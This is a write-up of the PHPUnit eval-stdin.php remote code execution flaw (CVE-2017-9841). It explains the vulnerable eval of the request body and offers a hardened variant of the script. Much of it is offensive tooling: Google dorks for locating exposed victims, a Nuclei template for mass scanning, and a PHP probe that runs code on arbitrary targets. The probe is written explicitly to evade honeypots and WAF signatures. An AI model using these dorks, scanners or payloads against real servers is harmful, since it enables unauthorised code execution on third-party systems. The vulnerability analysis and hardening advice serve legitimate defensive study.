The vulnerability exists because eval-stdin.php reads the body of an incoming HTTP request and executes it as PHP code, with no authentication, authorization or origin check of any kind.
The file ships with PHPUnit, the standard testing framework for PHP, under vendor/phpunit/phpunit/src/Util/PHP/. PHPUnit uses it to run tests in an isolated child process: the runner starts a fresh PHP interpreter, feeds it the test code over standard input, and this small helper script evaluates whatever it receives. It is a plain script, not a class, and it was never meant to be reached by an end user. In the affected releases (PHPUnit before 4.8.28 and 5.x before 5.6.3, tracked as CVE-2017-9841) it contains no guard clause at all, for example if (!defined('PHPUNIT_TESTING')) die(); or a check that PHP_SAPI is 'cli'.
Consequently, if the web server (Apache, Nginx, IIS) serves files from the vendor directory, an attacker can request the script over HTTP. The PHP interpreter loads the file, reads the attacker's POST body via php://input, and passes it straight to the dangerous eval() function. The only constraint on the payload is that it must begin with a "<?php" opening tag, because the script prefixes the input with a closing "?>" before evaluating it; anything before an opening tag is echoed back as text rather than executed.
In the affected releases the file contains logic equivalent to this simplified snippet:
<?php
// Simplified representation of the vulnerable logic: under a web SAPI the
// "standard input" the script was written for is the HTTP request body
// (php://input), and it is handed to eval() with no check at all.
eval('?>' . file_get_contents('php://input'));
This functionality is designed to help developers run isolated unit tests, but eval() on input that is not strictly controlled is inherently dangerous: the script trusts that its caller is the PHPUnit process runner, and nothing in the script itself enforces that.
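As an added example (not PHPUnit's own code, and not the upstream fix, which is to upgrade to 4.8.28 / 5.6.3), here is a hardened variant of the script that adds the guard clause described above. It refuses to run under any web SAPI, reads only the real process standard input, and additionally requires an opt-in environment variable; the variable name PHPUNIT_EVAL_STDIN_ALLOWED is an assumption chosen for this example, not a PHPUnit mechanism.

```php
<?php
// Added example, not PHPUnit's code: a hardened eval-stdin.php.
// 1. Fail closed unless we are a command-line process. Under mod_php, php-fpm,
//    CGI or the built-in server (cli-server) the script is being reached over
//    HTTP and the "input" would be attacker-controlled.
if (PHP_SAPI !== 'cli') {
    http_response_code(403);
    exit('eval-stdin.php may only be run from the command line.');
}

// 2. Require an explicit opt-in from the process that spawned us. The name of
//    this variable is an assumption for the example; any secret-free marker
//    that only the legitimate runner sets would do, since the point is to stop
//    accidental invocation rather than to authenticate a hostile parent.
if (getenv('PHPUNIT_EVAL_STDIN_ALLOWED') !== '1') {
    fwrite(STDERR, "refusing to eval: PHPUNIT_EVAL_STDIN_ALLOWED is not set\n");
    exit(1);
}

// 3. Only the real process standard input is consulted, never php://input.
//    In the CLI SAPI the STDIN constant is always defined.
$code = stream_get_contents(STDIN);
if ($code === false || $code === '') {
    exit(0);
}

// Keep PHPUnit's convention: the input is a complete PHP file that starts with
// its own "<?php" tag, so close PHP mode first and let the input reopen it.
eval('?>' . $code);
```

Invoke it the way the runner would, for instance PHPUNIT_EVAL_STDIN_ALLOWED=1 php eval-stdin.php < test.php. The guard is defence in depth only: the real fix is to upgrade PHPUnit and to keep vendor/ outside the document root (or deny it in the web server configuration), so that no development dependency is reachable over HTTP at all.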
Exploiting this vulnerability is trivial: a single unauthenticated POST request does it, with no exploit chain, memory corruption or timing window involved.
Use Google Dorks, GitHub code search, or custom crawlers to find exposed instances:
Google Dorks:
intitle:"index of" "vendor/phpunit/phpunit/src/Util/PHP"
intitle:"index of" "eval-stdin.php"
Mass scanning with Nuclei:
id: CVE-2017-9841

info:
  name: PHPUnit eval-stdin.php RCE
  author: your-handle   # nuclei requires an author field; replace with yours
  severity: critical

requests:
  - method: POST
    path:
      - "{{BaseURL}}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
    body: "<?php echo md5('test'); ?>"
    matchers:
      - type: word
        part: body
        words:
          - "098f6bcd4621d373cade4e832627b4f6"
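The Nuclei template above, and the one-request exploit it automates, rely on a fixed payload whose output (md5('test')) is well known; a honeypot can return that string without running anything, and the payload itself is easy to signature. As an added example that is not part of the original page or of any tool it mentions, the following PHP CLI probe generalises the same check with a per-run random marker, so only a server that really evaluated the body can produce the expected digest. It assumes the vulnerable path shown above and a plain HTTP(S) target; the function names are this example's own.

```php
<?php
// Added example, not from the page or PHPUnit: probe one host for an exposed
// eval-stdin.php using a random marker instead of a fixed, signatured payload.

const EVAL_STDIN_PATH = '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php';

/**
 * Returns 'vulnerable', 'not-vulnerable' or 'unreachable'.
 * $sender lets a caller inject another transport (or a fake one for testing);
 * it receives ($url, $body) and returns [status, responseBody] or null.
 */
function probeEvalStdin(string $baseUrl, ?callable $sender = null): string
{
    $marker   = bin2hex(random_bytes(8));
    // The body must start with "<?php": the vulnerable line is
    // eval('?>' . ...), so text before an opening tag is echoed, not executed.
    $payload  = "<?php echo md5('" . $marker . "'); ?>";
    $expected = md5($marker);

    $url      = rtrim($baseUrl, '/') . EVAL_STDIN_PATH;
    $sender   = $sender ?? 'httpPost';
    $response = $sender($url, $payload);
    if ($response === null) {
        return 'unreachable';
    }
    [$status, $body] = $response;

    // A page that merely reflects the request body contains $marker in clear
    // but never its digest; a canned honeypot reply cannot know $marker at all.
    // Only the digest proves that eval() ran our code.
    if ($status === 200 && strpos($body, $expected) !== false) {
        return 'vulnerable';
    }
    return 'not-vulnerable';
}

/** Default transport: POST via PHP's http stream wrapper, 5 s timeout, no redirects. */
function httpPost(string $url, string $body): ?array
{
    $ctx = stream_context_create(['http' => [
        'method'          => 'POST',
        'header'          => "Content-Type: text/plain\r\n",
        'content'         => $body,
        'timeout'         => 5,
        'ignore_errors'   => true, // hand back 4xx/5xx bodies instead of false
        'follow_location' => 0,    // a redirect to a login page is not a hit
    ]]);
    $data = @file_get_contents($url, false, $ctx);
    if ($data === false) {
        return null; // DNS failure, refused connection, TLS error, timeout
    }
    // $http_response_header is filled in by the wrapper; index 0 is the status line.
    $status = preg_match('#^HTTP/\S+\s+(\d{3})#', $http_response_header[0] ?? '', $m)
        ? (int) $m[1]
        : 0;
    return [$status, $data];
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    echo probeEvalStdin($argv[1]), PHP_EOL;
}
```

Run it as php probe.php https://target.example; the three-state result keeps "could not connect" apart from "connected and not vulnerable", which matters when triaging a large scan. Because the marker changes on every run, the request cannot be matched by a static body signature, so a negative result from a WAF-fronted host says something about the application rather than about the WAF's rule set.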